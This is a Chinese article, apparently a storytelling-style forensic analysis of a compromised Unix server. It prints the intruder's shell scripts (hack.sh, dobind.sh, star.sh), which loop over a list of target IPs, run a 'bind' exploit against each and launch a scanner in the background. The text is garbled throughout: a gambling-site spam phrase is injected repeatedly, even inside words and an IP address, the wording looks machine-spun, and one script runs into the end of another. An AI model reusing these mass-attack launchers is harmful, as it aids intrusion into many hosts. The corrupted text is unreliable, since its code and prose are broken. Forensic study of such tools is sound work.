快捷搜索:  as  2018  FtCWSyGV  С˵  test  xxx  Ψһ  w3viyKQx

万象城娱乐官网下载_大战黑客传之(3)军情刺探



话说我等携了那些怪异官兵的整个资料回到大年夜本营细细鞫万象城娱乐官网下载讯......首先是那些sh门下的

,他们没有什么保密纪律可言, 一下就都招了

供词如下:

hack.sh: //当然了, 这个家伙的名字就够吸惹人的

#!/bin/sh

# hach.sh, by xxxxxx@263.net, xx-xx, xxxx

clear

tail -f hosts.log | while read TARGET

do

./dobind.sh $TARGET

done

##万象城娱乐官网下载############ End of hach.sh

原本只是个帮凶, 从hosts.log读出些器械来交给dobind.sh来处置惩罚

再看dobind.sh是何方神圣:

#!/bin/sh

# dobind.sh, by xxxxxx@263.net, xx-xx, xxxx

/bind $1 >/dev/null 2>>/dev/null3>>/dev/null

./scan $ADDRESS

done

############## End of scan.sh

着末一个是star.sh看来是他们的头儿:

#!/bin/sh

# star.sh, by xxxxxx@263.net, xx-xx, xxxx

# Let's go!

rm -rf bindname.log

touch bindname.log

nohup ./scan.sh >>/dev/null &

nohup ./hack.sh >>/dev/null &

############## End of star.sh

好吗, 看起来这可不是一个一样平常的江湖混混,早已取得系统的最高权限, 并在此安排了几

个euid=root的"鼹鼠",八成是一个黑道高手, 至少从他的这几个部下的水平来看是这样,不过

稀罕的事怎么他没有悄然默默换掉落营中的几个心腹兵丁(ps, ls, etc),让我们很轻易的找到了他

的蛛丝马迹,那些躲在东西房(/dev)的可疑官兵也无所遁形,着末还有一些其他相关文件要看

:

比如上面dobind.sh用到的hosts.log:

xxx.49.6.182

xxx.49.8.196

xxx.49.9.万象城娱乐官网下载204

xxx.49.12.20

xxx.4.143.132

xxx.4.145.100

xxx.4.146.124

xxx.4.149.80

xxx.4.158.110

xxx.4.158.160

xxx.4.160.28

......

(处于安然的斟酌, 此处隐去了地址的最高段)

全是江湖上的各个门派的所在(IP地址)....然后, 黑客叮咛在hac万象城娱乐官网下载k.sh中逐个掏出地址打

发部下bind.sh对于他们去了

这个hosts.log从哪里来的呢?从star.s万象城娱乐官网下载h看来, 只有scan.sh来做这件事了,那么就要看s

can.sh调遣的兵丁rundb和scan了。可是这两个都是ELF 派的,铁齿钢牙, 嘴不好撬啊....(未完待续)

您可能还会对下面的文章感兴趣: